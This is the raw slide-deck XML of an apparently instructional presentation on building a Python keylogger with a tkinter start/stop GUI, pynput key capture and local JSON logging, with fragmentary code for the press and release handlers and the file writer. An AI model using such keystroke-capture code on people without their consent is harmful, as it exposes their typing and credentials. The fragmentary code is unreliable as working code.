            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="586490" y="1618937"/>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r>
              <a:rPr altLang="zh-CN" baseline="0" b="0" cap="none" sz="2000" i="0" kern="1200" lang="en-US" spc="0" strike="noStrike" u="none">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
                <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t> </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8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590" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="581192" y="323232"/>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lvl="1" marL="629412">
              <a:lnSpc>
                <a:spcPct val="10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altLang="en-US" baseline="0" b="0" cap="none" sz="2400" i="0" kern="1200" lang="zh-CN" spc="0" strike="noStrike" u="none">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="华文中宋"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59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595" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="909017" y="23393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943" marL="305943">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr altLang="zh-CN" baseline="0" b="1" cap="none" sz="1800" i="0" kern="1200" lang="en-US" spc="0" strike="noStrike" u="none">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altLang="zh-CN" baseline="0" b="1" cap="none" sz="18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305943" marL="305943">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr altLang="zh-CN" baseline="0" b="0" cap="none" sz="1700" i="0" kern="1200" lang="en-US" spc="0" strike="noStrike" u="none">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altLang="zh-CN" baseline="0" b="0" cap="none" sz="17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04"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05"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1800" i="0" kern="1200" lang="en-US" spc="0" strike="noStrike" u="none">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>	</a:t>
            </a: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06" name="矩形"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="581192" y="1120211"/>
            <a:ext cx="11345068" cy="3838449"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0" bIns="198375" lIns="0" rIns="0" tIns="198375" vert="horz" wrap="none">
            <a:prstTxWarp prst="textNoShape"/>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" fontAlgn="base" hangingPunct="0" indent="0" latinLnBrk="0" marL="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr altLang="zh-CN" baseline="0" b="1" cap="none" sz="2000" i="0" kern="1200" lang="en-US" spc="0" strike="noStrike" u="none">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altLang="zh-CN" baseline="0" b="1"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zh-CN" baseline="0" b="1" cap="none" sz="1100" i="0" kern="1200" lang="en-US" spc="0" strike="noStrike" u="none">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"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Design the GUI: Create a simple GUI using </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tkinter</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that includes a start and stop button.</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2"/>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Implement the keylogger functionality: Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" baseline="0" b="1" cap="none" sz="3200" i="0" kern="1200" lang="en-US" spc="0" strike="noStrike" u="none">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="ui-monospace" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>pynput</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library to capture the key presses and releases.</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3"/>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Implement JSON file generation: Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" baseline="0" b="1" cap="none" sz="3200" i="0" kern="1200" lang="en-US" spc="0" strike="noStrike" u="none">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="ui-monospace" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>json</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library to generate a JSON file that contains the</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a:t>
            </a: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 keylogging data.</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4"/>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ClrTx/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <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altLang="zh-CN" baseline="0" b="0" cap="none" sz="2000" i="0" kern="1200" lang="en-US" spc="0" strike="noStrike" u="none">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" fontAlgn="base" hangingPunct="0" indent="0" latinLnBrk="0" marL="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr altLang="en-US" baseline="0" b="0" cap="none" sz="3200" i="0" kern="1200" lang="zh-CN" spc="0" strike="noStrike" u="none">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Franklin Gothic Book"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25"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6" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="380989" y="47716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pic>
        <p:nvPicPr>
          <p:cNvPr id="2097155" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1767592" y="2813831"/>
            <a:ext cx="8087854" cy="1524213"/>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3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1" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="218429" y="-43123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a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" baseline="0" b="1" cap="none" sz="2000" i="0" kern="1200" lang="en-US" spc="0" strike="noStrike" u="none">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Create GUI</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pic>
        <p:nvPicPr>
          <p:cNvPr id="2097156" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="581192" y="1745289"/>
            <a:ext cx="10955278" cy="466790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35"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6"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37" name="矩形"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320" cy="542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Initialize the variables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 =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on_press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flag,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{'Pressed':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{'Held':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4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42" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="296711" y="-427071"/>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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a: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zh-CN" baseline="0" b="1" cap="none" sz="2000" i="0" kern="1200" lang="en-US" spc="0" strike="noStrike" u="none">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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3" name="矩形"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320" cy="489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on_release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global flag,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keys_used.append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{'Released': f'{key}'}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if flag == True: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flag = False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keys = keys + str(key)</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Define the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generate_json_file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function</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def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generate_json_file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with open('</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key_log.json</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wb</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as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key_list_bytes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json.dumps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keys_used</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).encode()</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        </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key_log.write</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key_list_bytes</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr altLang="zh-CN" baseline="0" b="0" cap="none" sz="1800" i="0" kern="1200" lang="en-US" spc="0" strike="noStrike" u="none">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Franklin Gothic Book"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2021-05-25T07:50:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-05T03:44:14Z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fffc75688ff748f3ba96b9f4db018695</vt:lpwstr>
  </property>
</Properties>
</file>